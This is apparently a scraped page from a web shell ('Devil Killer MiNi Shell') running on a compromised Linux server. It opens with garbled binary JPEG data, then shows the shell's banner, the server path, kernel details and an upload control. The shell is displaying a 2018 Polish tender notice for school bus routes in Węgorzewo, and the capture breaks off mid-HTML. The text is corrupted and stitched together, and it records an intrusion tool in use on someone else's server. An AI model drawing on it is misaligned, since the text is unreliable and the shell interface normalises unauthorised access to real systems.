JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20181228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20181228/664744-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 664744-N-2018 z dnia 2018-12-28 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Zespół Obsługi Ekonomiczno-Administracyjnej Szkół i Przedszkoli</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Przewozy szkolne uczniów do szkół w gminie Węgorzewo do 30.06.2019 r. </span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Zespół Obsługi Ekonomiczno-Administracyjnej Szkół i Przedszkoli</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">101110600000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Zamkowa</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">3</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">11600 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Węgorzewo</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">warmińsko-mazurskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">0-87 4272181, 4275450</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">elwaira@wp.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">0-87 4272185</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url"></span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia">www.wegorzewo.pl </span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.wegorzewo.pl </span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Przewozy szkolne uczniów do szkół w gminie Węgorzewo do 30.06.2019 r. </span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny"></span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">cztery</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Część I-trasa 1 -dowóz do szkół w Węgorzewie -SP nr 1, SP nr 2, Przedszkola nr 1, Przedszkola nr 2: 1.SP 1: Ogonki - ul. Pionierów -do 10 km; Kolonia Rybacka-ul. Pionierów -do 10 km; Razem: 16, w tym: 16 biletów do 10 km. trasa 2- dowóz do szkół w Węgorzewie do SP 1,SP 2, Przedszkola nr 1; 1.Stręgiel-Węgorzewo ul. Kraszewskiego -do 10 km - 8 b. Stręgiel - Węgorzewo ul. Pionierów - 1 b. 2. Matyski-Węgorzewo ul. Kraszewskiego- do 10 km-4 b.; 3. Kalskie Nowiny-Węgorzewo ul. Kraszewskiego-10 b. - do 5 km ;. Kalskie Nowiny- Węgorzewo ul. Pionierów- do 10 km -1 b. Węgorzewo-Trygort kolonia rozwóz -do 5m -1 b. Węgorzewo -Trygort rozwóz -do 10 km-12 b. Węgorzewo Stawki rozwóz do 15 km - 1 b. Węgorzewo - Przystań rozwóz do 20 km -1 b. Razem 39 b: w tym 24 dowóz i rozwóz - 14 do 10 km; 10 do 5 km; oraz 15 tylko rozwóz  1/2  b. - 1 do 5km, 12 do 10 km, 1 do 15 km, 1 do 20 km. Trasa 3: - dowóz do szkół w Węgorzewie do SP 1,SP 2, Przedszkola nr 1 i SOSW w Węgorzewie. 1.Czerwony Dwór - Węgorzewo ul. Kraszewskiego i Pionierów -do 5 km; 2.Wysiecza - Węgorzewo ul. Kraszewskiego, Bema i Pionierów- do 5 km; 3.Jakunowo - Węgorzewo -do 10 km; 4.Stulichy - Węgorzewo- do 5 km; 5.Wilkowo - Węgorzewo- do 10 km; 6. Maćki - Węgorzewo- do 5 km; 7. Prynowo-Węgorzewo -do 10 km; ;. Razem: 56 biletów, w tym 38 do 5 km i 18 do 10 km. Część II-trasa 1:dowóz i rozwóz do SP1 w Węgorzewie uczniów dotychczasowego gimnazjum z obwodu SP w Węgielsztynie. 1.Węgielsztyn -Węgorzewo- do 10 km; 2.Dąbrówka Mała - Węgorzewo-do 15 km; 3.Wesołowo - Węgorzewo- do 20 km; 4.Biedaszki - Węgorzewo- do 15 km; 5.Guja - Węgorzewo- do 15 km; 6.Brzozowo - Węgorzewo- do 10 km. 6. Kolonia Różewiec-Węgorzewo - do 15 km. Razem: 12 biletów, w tym 5 do 10 km, 4 do 15 km, 3 do 20 km; Trasa 2: dowóz i rozwóz do SP 1 w Węgorzewie i SOSW w Węgorzewie uczniów z obwodu SP w Perłach. 1.Łęgwarowo-Węgorzewo- do 20 km; 2.Rudziszki i zw. Suczki -Węgorzewo- do 15 km; 3.Pasternak -Węgorzewo- do 20 km; 4.Perły-Węgorzewo-do 15 km;5.Klimki -Węgorzewo-do 10 km. Razem: 5w tym 1 bilet do 10 km, 3 bilety do 15 km i 1 bilet do 20 km Część III-dowóz do SP w Węgielsztynie(tylko do szkoły). Trasa: 1.Dąbrówka Mała - Węgielsztyn- do 5 km; 2.Wesołowo - Węgielsztyn- do 10 km; 3.Biedaszki - Węgielsztyn- do 5 km; 4.Guja - Węgielsztyn- do 10 km; 5.Brzozowo - Węgielsztyn- do 10 km. Razem: 52, w tym 18 biletów do 5 km, 34 bilety do 10 km. Trasa 2: -rozwóz ze SP w Perłach (tylko ze szkoły do miejsca zamieszkania)- Trasa: 1.Rudziszki -Perły-do 5 km; 2.Pasternak - Perły- do 5 km; 3.Łęgwarowo - Perły- do 10 km; 4.Klimki - Perły- do 10 km; 5.Maćki - Perły- do 10 km. Razem: 58, w tym 29 biletów do 5 km, 29 do 10 km.Część IV-A -Dowóz i rozwóz w SP w Radziejach. 1.Pniewo - Radzieje- do 10 km; 2.Sztynort - Radzieje-do 10 km; 3.Sztynort Mały - Radzieje-do 10 km; 4.Kamionek Wielki - Radzieje-do 5 km; 5.Tarławki - Radzieje- do 10 km; 6.Surwile - Radzieje- do 10 km; 7.Pilwa - Radzieje-do 5 km; 8.Kamień - Radzieje-do 10 km; 9. Łabapa -Radzieje-do 10 km. Razem: 48, w tym 10biletów do 5 km, 38 biletów do 10 km. </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">60100000-9</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp. Zamówienie polegałoby na powtórzeniu podobnych usług jak w zamówieniu podstawowym i byłoby zgodne z jego przedmiotem do 30.06.2018 r.</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">5</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>5</TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Warunek zostanie spełniony, jeśli wykonawca wykaże, że posiada licencję na wykonywanie krajowego transportu osób zgodnie z ustawą o transporcie drogowym.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Warunek zostanie spełniony, jeśli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w związku z prowadzoną działalnością gospodarczą zgodną z przedmiotem zamówienia na sumę gwarancyjną min. 60 000,00 PLN w przypadku składania ofert na min. 1 do max. 2 części lub 120 000,00 PLN na 3 i więcej części. Fakt opłacenia polisy musi wynikać z jej treści lub innego załączonego dokumentu.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że:1)	dysponuje lub będzie dysponował na czas realizacji zamówienia aktualnie zarejestrowanymi, posiadającymi aktualne przeglądy techniczne i ubezpieczenie pojazdami w ilościach: a)	co najmniej 4 pojazdami przystosowanym do wykonywania przewozów uczniów w przypadku składania oferty na część I zamówieniab)	co najmniej 2 pojazdami przystosowanymi do wykonywania przewozów uczniów w przypadku składania oferty na część II zamówienia c)	co najmniej 1 pojazdem przystosowanym do wykonywania przewozów uczniów w przypadku składania oferty na część III zamówienia d)	co najmniej 2 pojazdami przystosowanymi do wykonywania przewozów uczniów w przypadku składania oferty na część IV zamówienia e)	co najmniej 9 pojazdami przystosowanymi do wykonywania przewozów uczniów w przypadku składania oferty na wszystkie części Pojazdy, o których mowa w punkcie III podpunkt 1 muszą spełniać następujące wymagania w zakresie ilości miejsc:a)	Dla Części I: o łącznej liczbie miejsc pasażerów z kierowcą i opiekunem co najmniej 18 w pierwszym pojeździe, o łącznej liczbie miejsc pasażerów z kierowcą i opiekunem co najmniej 26 w drugim pojeździe oraz o łącznej liczbie miejsc pasażerów z kierowcą i opiekunem co najmniej 60 w kolejnych dwóch pojazdach, przy czym -w jednym pojeździe o łącznej liczbie miejsc 28 a w drugim o łącznej liczbie miejsc 32,b)	dla Części II o łącznej liczbie miejsc pasażerów z kierowcą i opiekunem co najmniej 14 w pierwszym pojeździe i o łącznej liczbie miejsc pasażerów z kierowcą i opiekunem co najmniej 7 w drugim pojeździe,c)	dla Części III o łącznej liczbie miejsc pasażerów z kierowcą i opiekunem co najmniej 54 w jednym pojeździe d) dla Części IV o łącznej liczbie miejsc pasażerów z kierowcą i opiekunem co najmniej 52 w dwóch pojazdach, przy czym -w jednym pojeździe o łącznej liczbie miejsc 29 a w drugim o łącznej liczbie miejsc 23,2)	Dysponują osobami zdolnymi do wykonania zamówienia: tj. Wykonawca zobowiązany jest wykazać, że dysponuje lub będzie dysponować na czas realizacji zamówienia opiekunami oraz kierowcami posiadającymi kwalifikacje do kierowania pojazdami przeznaczonymi do przewozu osób. Ilość opiekunów i kierowców, którymi dysponuje Wykonawca musi odpowiadać liczbie pojazdów wykazanych na poszczególne części zadania, według zasady jeden opiekun i kierowca w jednym pojeździe. Przez osobę opiekuna rozumie się osobę, która nie kieruje pojazdem. </span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span 